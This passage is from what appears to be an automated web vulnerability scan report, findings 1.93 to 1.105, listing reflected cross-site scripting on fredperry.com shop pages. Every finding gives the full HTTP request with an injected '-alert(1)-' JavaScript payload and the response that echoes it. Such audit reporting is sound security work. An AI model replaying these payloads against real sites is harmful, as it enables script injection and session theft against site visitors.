pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/");
//]]>
...[SNIP]...

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98e0"-alert(1)-"c82982309e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8uq4t9tp6ek6qei8dt0k6npeg0; expires=Tue, 09-Nov-2010 17:09:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Stussy
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1");
//]]>
...[SNIP]...

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47139"-alert(1)-"b6d2d00f18f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfu3s4rje88g7t3ohsukesr565; expires=Tue, 09-Nov-2010 17:14:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/");
//]]>
...[SNIP]...

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee4ce"-alert(1)-"3a91705cda8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ols796ihtsstq0v73n79ngdik2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/");
//]]>
...[SNIP]...

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d891"-alert(1)-"954da85411 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b1epgpls29dt2opr8uvoi9n5r4; expires=Tue, 09-Nov-2010 17:15:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/");
//]]>
...[SNIP]...

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a4d7"-alert(1)-"2d4c44a3758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ubuiuuhet0dis73pjekk81b9h3; expires=Tue, 09-Nov-2010 17:12:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> British
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1");
//]]>
...[SNIP]...

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe56"-alert(1)-"1a825ea7b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i9k9giecjcr5q6n0askfpvs5f4; expires=Tue, 09-Nov-2010 17:12:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa46c"-alert(1)-"fd5429705a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eiabdltr7afs24cjo1kl3f3fl4; expires=Tue, 09-Nov-2010 17:13:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2872"-alert(1)-"429b7d0d03a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m9t2nujfnbq882ma058gmk5hq3; expires=Tue, 09-Nov-2010 17:13:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/");
//]]>
...[SNIP]...

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a8"-alert(1)-"6872c7ca1c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tq0lkqj1ku5kt3qfsve5dv2lu0; expires=Tue, 09-Nov-2010 17:12:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1");
//]]>
...[SNIP]...

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e13"-alert(1)-"1e1df12ea80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4hofbk9rao1b3tbe0ko177upb5; expires=Tue, 09-Nov-2010 17:08:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29976"-alert(1)-"56522880a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h3d2v4e6cnf09ine2ihuj62p74; expires=Tue, 09-Nov-2010 17:08:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f7b"-alert(1)-"9130791ac77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f4lees3sdljodl2notjhfc64m1; expires=Tue, 09-Nov-2010 17:09:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/");
//]]>
...[SNIP]...

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of the SID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6089"-alert(1)-"78f69521811 was submitted in the SID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811 HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=23llskiairskf7nqs63bm7fup7; expires=Tue, 09-Nov-2010 19:36:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 32771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
